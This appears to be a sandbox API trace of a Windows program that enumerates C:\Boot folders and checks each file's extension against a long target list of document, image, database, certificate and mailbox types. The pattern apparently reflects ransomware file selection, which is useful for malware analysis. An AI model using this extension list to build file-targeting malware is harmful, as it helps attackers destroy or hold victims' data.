lstrlenW (lpString=".dotx") returned 5 [0285.090] lstrcmpiW (lpString1=".dotx", lpString2="e.mui") returned -1 [0285.090] lstrlenW (lpString=".dpx") returned 4 [0285.090] lstrcmpiW (lpString1=".dpx", lpString2=".mui") returned -1 [0285.090] lstrlenW (lpString=".dqy") returned 4 [0285.090] lstrcmpiW (lpString1=".dqy", lpString2=".mui") returned -1 [0285.090] lstrlenW (lpString=".dsn") returned 4 [0285.090] lstrcmpiW (lpString1=".dsn", lpString2=".mui") returned -1 [0285.090] lstrlenW (lpString=".dt") returned 3 [0285.090] lstrcmpiW (lpString1=".dt", lpString2="mui") returned -1 [0285.090] lstrlenW (lpString=".dtd") returned 4 [0285.090] lstrcmpiW (lpString1=".dtd", lpString2=".mui") returned -1 [0285.090] lstrlenW (lpString=".dwg") returned 4 [0285.090] lstrcmpiW (lpString1=".dwg", lpString2=".mui") returned -1 [0285.090] lstrlenW (lpString=".dwt") returned 4 [0285.091] lstrcmpiW (lpString1=".dwt", lpString2=".mui") returned -1 [0285.091] lstrlenW (lpString=".dx") returned 3 [0285.091] lstrcmpiW (lpString1=".dx", lpString2="mui") returned -1 [0285.091] lstrlenW (lpString=".dxf") returned 4 [0285.091] lstrcmpiW (lpString1=".dxf", lpString2=".mui") returned -1 [0285.091] lstrlenW (lpString=".edml") returned 5 [0285.091] lstrcmpiW (lpString1=".edml", lpString2="e.mui") returned -1 [0285.091] lstrlenW (lpString=".efd") returned 4 [0285.091] lstrcmpiW (lpString1=".efd", lpString2=".mui") returned -1 [0285.091] lstrlenW (lpString=".elf") returned 4 [0285.091] lstrcmpiW (lpString1=".elf", lpString2=".mui") returned -1 [0285.091] lstrlenW (lpString=".emf") returned 4 [0285.091] lstrcmpiW (lpString1=".emf", lpString2=".mui") returned -1 [0285.091] lstrlenW (lpString=".emz") returned 4 [0285.091] lstrcmpiW (lpString1=".emz", lpString2=".mui") returned -1 [0285.091] lstrlenW (lpString=".epf") returned 4 [0285.091] lstrcmpiW (lpString1=".epf", lpString2=".mui") returned -1 [0285.091] lstrlenW (lpString=".eps") returned 4 [0285.091] lstrcmpiW (lpString1=".eps", lpString2=".mui") returned -1 [0285.091] lstrlenW (lpString=".epsf") returned 5 [0285.091] lstrcmpiW (lpString1=".epsf", lpString2="e.mui") returned -1 [0285.091] lstrlenW (lpString=".epsp") returned 5 [0285.091] lstrcmpiW (lpString1=".epsp", lpString2="e.mui") returned -1 [0285.091] lstrlenW (lpString=".erf") returned 4 [0285.091] lstrcmpiW (lpString1=".erf", lpString2=".mui") returned -1 [0285.091] lstrlenW (lpString=".exr") returned 4 [0285.092] lstrcmpiW (lpString1=".exr", lpString2=".mui") returned -1 [0285.092] lstrlenW (lpString=".f4v") returned 4 [0285.092] lstrcmpiW (lpString1=".f4v", lpString2=".mui") returned -1 [0285.092] lstrlenW (lpString=".fido") returned 5 [0285.092] lstrcmpiW (lpString1=".fido", lpString2="e.mui") returned -1 [0285.092] lstrlenW (lpString=".flm") returned 4 [0285.092] lstrcmpiW (lpString1=".flm", lpString2=".mui") returned -1 [0285.092] lstrlenW (lpString=".flv") returned 4 [0285.092] lstrcmpiW (lpString1=".flv", lpString2=".mui") returned -1 [0285.092] lstrlenW (lpString=".frm") returned 4 [0285.092] lstrcmpiW (lpString1=".frm", lpString2=".mui") returned -1 [0285.092] lstrlenW (lpString=".fxg") returned 4 [0285.092] lstrcmpiW (lpString1=".fxg", lpString2=".mui") returned -1 [0285.092] lstrlenW (lpString=".geo") returned 4 [0285.092] lstrcmpiW (lpString1=".geo", lpString2=".mui") returned -1 [0285.092] lstrlenW (lpString=".gif") returned 4 [0285.092] lstrcmpiW (lpString1=".gif", lpString2=".mui") returned -1 [0285.092] lstrlenW (lpString=".grs") returned 4 [0285.092] lstrcmpiW (lpString1=".grs", lpString2=".mui") returned -1 [0285.092] lstrlenW (lpString=".gz") returned 3 [0285.092] lstrcmpiW (lpString1=".gz", lpString2="mui") returned -1 [0285.092] lstrlenW (lpString=".h") returned 2 [0285.092] lstrcmpiW (lpString1=".h", lpString2="ui") returned -1 [0285.092] lstrlenW (lpString=".hdr") returned 4 [0285.092] lstrcmpiW (lpString1=".hdr", lpString2=".mui") returned -1 [0285.092] lstrlenW (lpString=".hpp") returned 4 [0285.092] lstrcmpiW (lpString1=".hpp", lpString2=".mui") returned -1 [0285.092] lstrlenW (lpString=".hta") returned 4 [0285.093] lstrcmpiW (lpString1=".hta", lpString2=".mui") returned -1 [0285.093] lstrlenW (lpString=".htc") returned 4 [0285.093] lstrcmpiW (lpString1=".htc", lpString2=".mui") returned -1 [0285.093] lstrlenW (lpString=".htm") returned 4 [0285.093] lstrcmpiW (lpString1=".htm", lpString2=".mui") returned -1 [0285.093] lstrlenW (lpString=".html") returned 5 [0285.093] lstrcmpiW (lpString1=".html", lpString2="e.mui") returned -1 [0285.093] lstrlenW (lpString=".icb") returned 4 [0285.093] lstrcmpiW (lpString1=".icb", lpString2=".mui") returned -1 [0285.093] lstrlenW (lpString=".ics") returned 4 [0285.093] lstrcmpiW (lpString1=".ics", lpString2=".mui") returned -1 [0285.093] lstrlenW (lpString=".iff") returned 4 [0285.093] lstrcmpiW (lpString1=".iff", lpString2=".mui") returned -1 [0285.093] lstrlenW (lpString=".inc") returned 4 [0285.093] lstrcmpiW (lpString1=".inc", lpString2=".mui") returned -1 [0285.093] lstrlenW (lpString=".indd") returned 5 [0285.093] lstrcmpiW (lpString1=".indd", lpString2="e.mui") returned -1 [0285.093] lstrlenW (lpString=".ini") returned 4 [0285.093] lstrcmpiW (lpString1=".ini", lpString2=".mui") returned -1 [0285.093] lstrlenW (lpString=".iqy") returned 4 [0285.093] lstrcmpiW (lpString1=".iqy", lpString2=".mui") returned -1 [0285.093] lstrlenW (lpString=".j2c") returned 4 [0285.093] lstrcmpiW (lpString1=".j2c", lpString2=".mui") returned -1 [0285.093] lstrlenW (lpString=".j2k") returned 4 [0285.093] lstrcmpiW (lpString1=".j2k", lpString2=".mui") returned -1 [0285.093] lstrlenW (lpString=".java") returned 5 [0285.093] lstrcmpiW (lpString1=".java", lpString2="e.mui") returned -1 [0285.094] lstrlenW (lpString=".jp2") returned 4 [0285.094] lstrcmpiW (lpString1=".jp2", lpString2=".mui") returned -1 [0285.094] lstrlenW (lpString=".jpc") returned 4 [0285.094] lstrcmpiW (lpString1=".jpc", lpString2=".mui") returned -1 [0285.094] lstrlenW (lpString=".jpe") returned 4 [0285.094] lstrcmpiW (lpString1=".jpe", lpString2=".mui") returned -1 [0285.094] lstrlenW (lpString=".jpeg") returned 5 [0285.094] lstrcmpiW (lpString1=".jpeg", lpString2="e.mui") returned -1 [0285.094] lstrlenW (lpString=".jpf") returned 4 [0285.094] lstrcmpiW (lpString1=".jpf", lpString2=".mui") returned -1 [0285.094] lstrlenW (lpString=".jpg") returned 4 [0285.094] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0285.094] lstrlenW (lpString=".jpx") returned 4 [0285.094] lstrcmpiW (lpString1=".jpx", lpString2=".mui") returned -1 [0285.094] lstrlenW (lpString=".js") returned 3 [0285.094] lstrcmpiW (lpString1=".js", lpString2="mui") returned -1 [0285.094] lstrlenW (lpString=".jsf") returned 4 [0285.094] lstrcmpiW (lpString1=".jsf", lpString2=".mui") returned -1 [0285.094] lstrlenW (lpString=".json") returned 5 [0285.094] lstrcmpiW (lpString1=".json", lpString2="e.mui") returned -1 [0285.094] lstrlenW (lpString=".jsp") returned 4 [0285.094] lstrcmpiW (lpString1=".jsp", lpString2=".mui") returned -1 [0285.094] lstrlenW (lpString=".kdc") returned 4 [0285.094] lstrcmpiW (lpString1=".kdc", lpString2=".mui") returned -1 [0285.094] lstrlenW (lpString=".kmz") returned 4 [0285.094] lstrcmpiW (lpString1=".kmz", lpString2=".mui") returned -1 [0285.094] lstrlenW (lpString=".kwm") returned 4 [0285.095] lstrcmpiW (lpString1=".kwm", lpString2=".mui") returned -1 [0285.095] lstrlenW (lpString=".lasso") returned 6 [0285.095] lstrcmpiW (lpString1=".lasso", lpString2="xe.mui") returned -1 [0285.095] lstrlenW (lpString=".lbi") returned 4 [0285.095] lstrcmpiW (lpString1=".lbi", lpString2=".mui") returned -1 [0285.095] lstrlenW (lpString=".lgf") returned 4 [0285.095] lstrcmpiW (lpString1=".lgf", lpString2=".mui") returned -1 [0285.095] lstrlenW (lpString=".lgp") returned 4 [0285.095] lstrcmpiW (lpString1=".lgp", lpString2=".mui") returned -1 [0285.095] lstrlenW (lpString=".log") returned 4 [0285.095] lstrcmpiW (lpString1=".log", lpString2=".mui") returned -1 [0285.095] lstrlenW (lpString=".m1v") returned 4 [0285.095] lstrcmpiW (lpString1=".m1v", lpString2=".mui") returned -1 [0285.095] lstrlenW (lpString=".m4a") returned 4 [0285.095] lstrcmpiW (lpString1=".m4a", lpString2=".mui") returned -1 [0285.095] lstrlenW (lpString=".m4v") returned 4 [0285.095] lstrcmpiW (lpString1=".m4v", lpString2=".mui") returned -1 [0285.095] lstrlenW (lpString=".max") returned 4 [0285.095] lstrcmpiW (lpString1=".max", lpString2=".mui") returned -1 [0285.095] lstrlenW (lpString=".md") returned 3 [0285.095] lstrcmpiW (lpString1=".md", lpString2="mui") returned -1 [0285.095] lstrlenW (lpString=".mda") returned 4 [0285.095] lstrcmpiW (lpString1=".mda", lpString2=".mui") returned -1 [0285.095] lstrlenW (lpString=".mdb") returned 4 [0285.095] lstrcmpiW (lpString1=".mdb", lpString2=".mui") returned -1 [0285.095] lstrlenW (lpString=".mde") returned 4 [0285.095] lstrcmpiW (lpString1=".mde", lpString2=".mui") returned -1 [0285.096] lstrlenW (lpString=".mdf") returned 4 [0285.096] lstrcmpiW (lpString1=".mdf", lpString2=".mui") returned -1 [0285.096] lstrlenW (lpString=".mdw") returned 4 [0285.096] lstrcmpiW (lpString1=".mdw", lpString2=".mui") returned -1 [0285.096] lstrlenW (lpString=".mef") returned 4 [0285.096] lstrcmpiW (lpString1=".mef", lpString2=".mui") returned -1 [0285.096] lstrlenW (lpString=".mft") returned 4 [0285.096] lstrcmpiW (lpString1=".mft", lpString2=".mui") returned -1 [0285.096] lstrlenW (lpString=".mfw") returned 4 [0285.096] lstrcmpiW (lpString1=".mfw", lpString2=".mui") returned -1 [0285.096] lstrlenW (lpString=".mht") returned 4 [0285.096] lstrcmpiW (lpString1=".mht", lpString2=".mui") returned -1 [0285.096] lstrlenW (lpString=".mhtml") returned 6 [0285.096] lstrcmpiW (lpString1=".mhtml", lpString2="xe.mui") returned -1 [0285.096] lstrlenW (lpString=".mka") returned 4 [0285.096] lstrcmpiW (lpString1=".mka", lpString2=".mui") returned -1 [0285.096] lstrlenW (lpString=".mkidx") returned 6 [0285.096] lstrcmpiW (lpString1=".mkidx", lpString2="xe.mui") returned -1 [0285.096] lstrlenW (lpString=".mkv") returned 4 [0285.096] lstrcmpiW (lpString1=".mkv", lpString2=".mui") returned -1 [0285.096] lstrlenW (lpString=".mos") returned 4 [0285.096] lstrcmpiW (lpString1=".mos", lpString2=".mui") returned -1 [0285.096] lstrlenW (lpString=".mov") returned 4 [0285.096] lstrcmpiW (lpString1=".mov", lpString2=".mui") returned -1 [0285.096] lstrlenW (lpString=".mp3") returned 4 [0285.096] lstrcmpiW (lpString1=".mp3", lpString2=".mui") returned -1 [0285.096] lstrlenW (lpString=".mp4") returned 4 [0285.096] lstrcmpiW (lpString1=".mp4", lpString2=".mui") returned -1 [0285.097] lstrlenW (lpString=".mpeg") returned 5 [0285.097] lstrcmpiW (lpString1=".mpeg", lpString2="e.mui") returned -1 [0285.097] lstrlenW (lpString=".mpg") returned 4 [0285.097] lstrcmpiW (lpString1=".mpg", lpString2=".mui") returned -1 [0285.097] lstrlenW (lpString=".mpv") returned 4 [0285.097] lstrcmpiW (lpString1=".mpv", lpString2=".mui") returned -1 [0285.097] lstrlenW (lpString=".mrw") returned 4 [0285.097] lstrcmpiW (lpString1=".mrw", lpString2=".mui") returned -1 [0285.097] lstrlenW (lpString=".msg") returned 4 [0285.097] lstrcmpiW (lpString1=".msg", lpString2=".mui") returned -1 [0285.097] lstrlenW (lpString=".mxl") returned 4 [0285.097] lstrcmpiW (lpString1=".mxl", lpString2=".mui") returned 1 [0285.097] lstrlenW (lpString=".myd") returned 4 [0285.097] lstrcmpiW (lpString1=".myd", lpString2=".mui") returned 1 [0285.097] lstrlenW (lpString=".myi") returned 4 [0285.097] lstrcmpiW (lpString1=".myi", lpString2=".mui") returned 1 [0285.097] lstrlenW (lpString=".nef") returned 4 [0285.097] lstrcmpiW (lpString1=".nef", lpString2=".mui") returned 1 [0285.097] lstrlenW (lpString=".nrw") returned 4 [0285.097] lstrcmpiW (lpString1=".nrw", lpString2=".mui") returned 1 [0285.097] lstrlenW (lpString=".obj") returned 4 [0285.097] lstrcmpiW (lpString1=".obj", lpString2=".mui") returned 1 [0285.097] lstrlenW (lpString=".odb") returned 4 [0285.097] lstrcmpiW (lpString1=".odb", lpString2=".mui") returned 1 [0285.097] lstrlenW (lpString=".odc") returned 4 [0285.097] lstrcmpiW (lpString1=".odc", lpString2=".mui") returned 1 [0285.097] lstrlenW (lpString=".odm") returned 4 [0285.097] lstrcmpiW (lpString1=".odm", lpString2=".mui") returned 1 [0285.097] lstrlenW (lpString=".odp") returned 4 [0285.098] lstrcmpiW (lpString1=".odp", lpString2=".mui") returned 1 [0285.098] lstrlenW (lpString=".ods") returned 4 [0285.098] lstrcmpiW (lpString1=".ods", lpString2=".mui") returned 1 [0285.098] lstrlenW (lpString=".oft") returned 4 [0285.098] lstrcmpiW (lpString1=".oft", lpString2=".mui") returned 1 [0285.098] lstrlenW (lpString=".one") returned 4 [0285.098] lstrcmpiW (lpString1=".one", lpString2=".mui") returned 1 [0285.098] lstrlenW (lpString=".onepkg") returned 7 [0285.098] lstrcmpiW (lpString1=".onepkg", lpString2="exe.mui") returned -1 [0285.098] lstrlenW (lpString=".onetoc2") returned 8 [0285.098] lstrcmpiW (lpString1=".onetoc2", lpString2=".exe.mui") returned 1 [0285.098] lstrlenW (lpString=".opt") returned 4 [0285.098] lstrcmpiW (lpString1=".opt", lpString2=".mui") returned 1 [0285.098] lstrlenW (lpString=".oqy") returned 4 [0285.098] lstrcmpiW (lpString1=".oqy", lpString2=".mui") returned 1 [0285.098] lstrlenW (lpString=".orf") returned 4 [0285.098] lstrcmpiW (lpString1=".orf", lpString2=".mui") returned 1 [0285.098] lstrlenW (lpString=".p12") returned 4 [0285.098] lstrcmpiW (lpString1=".p12", lpString2=".mui") returned 1 [0285.098] lstrlenW (lpString=".p7b") returned 4 [0285.098] lstrcmpiW (lpString1=".p7b", lpString2=".mui") returned 1 [0285.098] lstrlenW (lpString=".p7c") returned 4 [0285.098] lstrcmpiW (lpString1=".p7c", lpString2=".mui") returned 1 [0285.098] lstrlenW (lpString=".pam") returned 4 [0285.098] lstrcmpiW (lpString1=".pam", lpString2=".mui") returned 1 [0285.098] lstrlenW (lpString=".pbm") returned 4 [0285.098] lstrcmpiW (lpString1=".pbm", lpString2=".mui") returned 1 [0285.098] lstrlenW (lpString=".pct") returned 4 [0285.099] lstrcmpiW (lpString1=".pct", lpString2=".mui") returned 1 [0285.099] lstrlenW (lpString=".pcx") returned 4 [0285.099] lstrcmpiW (lpString1=".pcx", lpString2=".mui") returned 1 [0285.099] lstrlenW (lpString=".pdd") returned 4 [0285.099] lstrcmpiW (lpString1=".pdd", lpString2=".mui") returned 1 [0285.099] lstrlenW (lpString=".pdf") returned 4 [0285.099] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0285.099] lstrlenW (lpString=".pdp") returned 4 [0285.099] lstrcmpiW (lpString1=".pdp", lpString2=".mui") returned 1 [0285.099] lstrlenW (lpString=".pef") returned 4 [0285.099] lstrcmpiW (lpString1=".pef", lpString2=".mui") returned 1 [0285.099] lstrlenW (lpString=".pem") returned 4 [0285.099] lstrcmpiW (lpString1=".pem", lpString2=".mui") returned 1 [0285.099] lstrlenW (lpString=".pff") returned 4 [0285.099] lstrcmpiW (lpString1=".pff", lpString2=".mui") returned 1 [0285.099] lstrlenW (lpString=".pfm") returned 4 [0285.099] lstrcmpiW (lpString1=".pfm", lpString2=".mui") returned 1 [0285.099] lstrlenW (lpString=".pfx") returned 4 [0285.099] lstrcmpiW (lpString1=".pfx", lpString2=".mui") returned 1 [0285.099] lstrlenW (lpString=".pgm") returned 4 [0285.099] lstrcmpiW (lpString1=".pgm", lpString2=".mui") returned 1 [0285.099] lstrlenW (lpString=".php") returned 4 [0285.099] lstrcmpiW (lpString1=".php", lpString2=".mui") returned 1 [0285.099] lstrlenW (lpString=".php3") returned 5 [0285.099] lstrcmpiW (lpString1=".php3", lpString2="e.mui") returned -1 [0285.099] lstrlenW (lpString=".php4") returned 5 [0285.099] lstrcmpiW (lpString1=".php4", lpString2="e.mui") returned -1 [0285.099] lstrlenW (lpString=".php5") returned 5 [0285.100] lstrcmpiW (lpString1=".php5", lpString2="e.mui") returned -1 [0285.100] lstrlenW (lpString=".phtml") returned 6 [0285.100] lstrcmpiW (lpString1=".phtml", lpString2="xe.mui") returned -1 [0285.100] lstrlenW (lpString=".pict") returned 5 [0285.100] lstrcmpiW (lpString1=".pict", lpString2="e.mui") returned -1 [0285.100] lstrlenW (lpString=".pl") returned 3 [0285.100] lstrcmpiW (lpString1=".pl", lpString2="mui") returned -1 [0285.100] lstrlenW (lpString=".pls") returned 4 [0285.100] lstrcmpiW (lpString1=".pls", lpString2=".mui") returned 1 [0285.100] lstrlenW (lpString=".pm") returned 3 [0285.100] lstrcmpiW (lpString1=".pm", lpString2="mui") returned -1 [0285.100] lstrlenW (lpString=".png") returned 4 [0285.100] lstrcmpiW (lpString1=".png", lpString2=".mui") returned 1 [0285.100] lstrlenW (lpString=".pnm") returned 4 [0285.100] lstrcmpiW (lpString1=".pnm", lpString2=".mui") returned 1 [0285.100] lstrlenW (lpString=".pot") returned 4 [0285.100] lstrcmpiW (lpString1=".pot", lpString2=".mui") returned 1 [0285.100] lstrlenW (lpString=".potm") returned 5 [0285.101] lstrcmpiW (lpString1=".potm", lpString2="e.mui") returned -1 [0285.101] lstrlenW (lpString=".potx") returned 5 [0285.101] lstrcmpiW (lpString1=".potx", lpString2="e.mui") returned -1 [0285.101] lstrlenW (lpString=".ppa") returned 4 [0285.101] lstrcmpiW (lpString1=".ppa", lpString2=".mui") returned 1 [0285.101] lstrlenW (lpString=".ppam") returned 5 [0285.101] lstrcmpiW (lpString1=".ppam", lpString2="e.mui") returned -1 [0285.101] lstrlenW (lpString=".ppm") returned 4 [0285.101] lstrcmpiW (lpString1=".ppm", lpString2=".mui") returned 1 [0285.101] lstrlenW (lpString=".pps") returned 4 [0285.101] lstrcmpiW (lpString1=".pps", lpString2=".mui") returned 1 [0285.101] lstrlenW (lpString=".ppsm") returned 5 [0285.101] lstrcmpiW (lpString1=".ppsm", lpString2="e.mui") returned -1 [0285.101] lstrlenW (lpString=".ppt") returned 4 [0285.101] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0285.101] lstrlenW (lpString=".pptm") returned 5 [0285.101] lstrcmpiW (lpString1=".pptm", lpString2="e.mui") returned -1 [0285.101] lstrlenW (lpString=".pptx") returned 5 [0285.101] lstrcmpiW (lpString1=".pptx", lpString2="e.mui") returned -1 [0285.101] lstrlenW (lpString=".prn") returned 4 [0285.101] lstrcmpiW (lpString1=".prn", lpString2=".mui") returned 1 [0285.101] lstrlenW (lpString=".ps") returned 3 [0285.101] lstrcmpiW (lpString1=".ps", lpString2="mui") returned -1 [0285.101] lstrlenW (lpString=".psb") returned 4 [0285.101] lstrcmpiW (lpString1=".psb", lpString2=".mui") returned 1 [0285.101] lstrlenW (lpString=".psd") returned 4 [0285.101] lstrcmpiW (lpString1=".psd", lpString2=".mui") returned 1 [0285.101] lstrlenW (lpString=".pst") returned 4 [0285.102] lstrcmpiW (lpString1=".pst", lpString2=".mui") returned 1 [0285.102] lstrlenW (lpString=".ptx") returned 4 [0285.102] lstrcmpiW (lpString1=".ptx", lpString2=".mui") returned 1 [0285.102] lstrlenW (lpString=".pub") returned 4 [0285.102] lstrcmpiW (lpString1=".pub", lpString2=".mui") returned 1 [0285.102] lstrlenW (lpString=".pwm") returned 4 [0285.102] lstrcmpiW (lpString1=".pwm", lpString2=".mui") returned 1 [0285.102] lstrlenW (lpString=".pxr") returned 4 [0285.102] lstrcmpiW (lpString1=".pxr", lpString2=".mui") returned 1 [0285.102] lstrlenW (lpString=".py") returned 3 [0285.102] lstrcmpiW (lpString1=".py", lpString2="mui") returned -1 [0285.102] lstrlenW (lpString=".qt") returned 3 [0285.102] lstrcmpiW (lpString1=".qt", lpString2="mui") returned -1 [0285.102] lstrlenW (lpString=".r3d") returned 4 [0285.102] lstrcmpiW (lpString1=".r3d", lpString2=".mui") returned 1 [0285.102] lstrlenW (lpString=".raf") returned 4 [0285.102] lstrcmpiW (lpString1=".raf", lpString2=".mui") returned 1 [0285.102] lstrlenW (lpString=".rar") returned 4 [0285.102] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0285.102] FindNextFileW (in: hFindFile=0x3947f68, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef57d0f5, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf3a246aa, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xafa0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0285.103] FindNextFileW (in: hFindFile=0x3947f68, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef57d0f5, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf3a246aa, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xafa0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0285.103] FindClose (in: hFindFile=0x3947f68 | out: hFindFile=0x3947f68) returned 1 [0285.103] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4014d58 | out: hHeap=0x470000) returned 1 [0285.103] FindNextFileW (in: hFindFile=0x3947e28, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa000b9ad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef586d37, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="es-ES", cAlternateFileName="")) returned 1 [0285.103] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x4014d58 [0285.103] lstrlenW (lpString="C:\\Boot\\es-ES") returned 13 [0285.103] FindFirstFileW (in: lpFileName="C:\\Boot\\es-ES\\*", lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa000b9ad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef586d37, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3947d68 [0285.103] FindNextFileW (in: hFindFile=0x3947d68, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa000b9ad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef586d37, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0285.104] FindNextFileW (in: hFindFile=0x3947d68, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4853f40, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x209949ab, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12f60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0285.104] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0285.104] lstrlenW (lpString=".1cd") returned 4 [0285.104] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0285.104] lstrlenW (lpString=".3ds") returned 4 [0285.104] lstrcmpiW (lpString1=".3ds", lpString2=".mui") returned -1 [0285.104] lstrlenW (lpString=".3fr") returned 4 [0285.104] lstrcmpiW (lpString1=".3fr", lpString2=".mui") returned -1 [0285.104] lstrlenW (lpString=".3g2") returned 4 [0285.104] lstrcmpiW (lpString1=".3g2", lpString2=".mui") returned -1 [0285.104] lstrlenW (lpString=".3gp") returned 4 [0285.104] lstrcmpiW (lpString1=".3gp", lpString2=".mui") returned -1 [0285.104] lstrlenW (lpString=".7z") returned 3 [0285.104] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0285.104] lstrlenW (lpString=".accda") returned 6 [0285.104] lstrcmpiW (lpString1=".accda", lpString2="xe.mui") returned -1 [0285.104] lstrlenW (lpString=".accdb") returned 6 [0285.104] lstrcmpiW (lpString1=".accdb", lpString2="xe.mui") returned -1 [0285.104] lstrlenW (lpString=".accdc") returned 6 [0285.104] lstrcmpiW (lpString1=".accdc", lpString2="xe.mui") returned -1 [0285.104] lstrlenW (lpString=".accde") returned 6 [0285.104] lstrcmpiW (lpString1=".accde", lpString2="xe.mui") returned -1 [0285.104] lstrlenW (lpString=".accdt") returned 6 [0285.104] lstrcmpiW (lpString1=".accdt", lpString2="xe.mui") returned -1 [0285.104] lstrlenW (lpString=".accdw") returned 6 [0285.105] lstrcmpiW (lpString1=".accdw", lpString2="xe.mui") returned -1 [0285.105] lstrlenW (lpString=".adb") returned 4 [0285.105] lstrcmpiW (lpString1=".adb", lpString2=".mui") returned -1 [0285.105] lstrlenW (lpString=".adp") returned 4 [0285.105] lstrcmpiW (lpString1=".adp", lpString2=".mui") returned -1 [0285.105] lstrlenW (lpString=".ai") returned 3 [0285.105] lstrcmpiW (lpString1=".ai", lpString2="mui") returned -1 [0285.105] lstrlenW (lpString=".ai3") returned 4 [0285.105] lstrcmpiW (lpString1=".ai3", lpString2=".mui") returned -1 [0285.105] lstrlenW (lpString=".ai4") returned 4 [0285.105] lstrcmpiW (lpString1=".ai4", lpString2=".mui") returned -1 [0285.105] lstrlenW (lpString=".ai5") returned 4 [0285.105] lstrcmpiW (lpString1=".ai5", lpString2=".mui") returned -1 [0285.105] lstrlenW (lpString=".ai6") returned 4 [0285.105] lstrcmpiW (lpString1=".ai6", lpString2=".mui") returned -1 [0285.105] lstrlenW (lpString=".ai7") returned 4 [0285.105] lstrcmpiW (lpString1=".ai7", lpString2=".mui") returned -1 [0285.105] lstrlenW (lpString=".ai8") returned 4 [0285.105] lstrcmpiW (lpString1=".ai8", lpString2=".mui") returned -1 [0285.105] lstrlenW (lpString=".anim") returned 5 [0285.105] lstrcmpiW (lpString1=".anim", lpString2="e.mui") returned -1 [0285.105] lstrlenW (lpString=".arw") returned 4 [0285.105] lstrcmpiW (lpString1=".arw", lpString2=".mui") returned -1 [0285.105] lstrlenW (lpString=".as") returned 3 [0285.105] lstrcmpiW (lpString1=".as", lpString2="mui") returned -1 [0285.105] lstrlenW (lpString=".asa") returned 4 [0285.105] lstrcmpiW (lpString1=".asa", lpString2=".mui") returned -1 [0285.105] lstrlenW (lpString=".asc") returned 4 [0285.106] lstrcmpiW (lpString1=".asc", lpString2=".mui") returned -1 [0285.106] lstrlenW (lpString=".ascx") returned 5 [0285.106] lstrcmpiW (lpString1=".ascx", lpString2="e.mui") returned -1 [0285.106] lstrlenW (lpString=".asm") returned 4 [0285.106] lstrcmpiW (lpString1=".asm", lpString2=".mui") returned -1 [0285.106] lstrlenW (lpString=".asmx") returned 5 [0285.106] lstrcmpiW (lpString1=".asmx", lpString2="e.mui") returned -1 [0285.106] lstrlenW (lpString=".asp") returned 4 [0285.106] lstrcmpiW (lpString1=".asp", lpString2=".mui") returned -1 [0285.106] lstrlenW (lpString=".aspx") returned 5 [0285.106] lstrcmpiW (lpString1=".aspx", lpString2="e.mui") returned -1 [0285.106] lstrlenW (lpString=".asr") returned 4 [0285.106] lstrcmpiW (lpString1=".asr", lpString2=".mui") returned -1 [0285.106] lstrlenW (lpString=".asx") returned 4 [0285.106] lstrcmpiW (lpString1=".asx", lpString2=".mui") returned -1 [0285.106] lstrlenW (lpString=".avi") returned 4 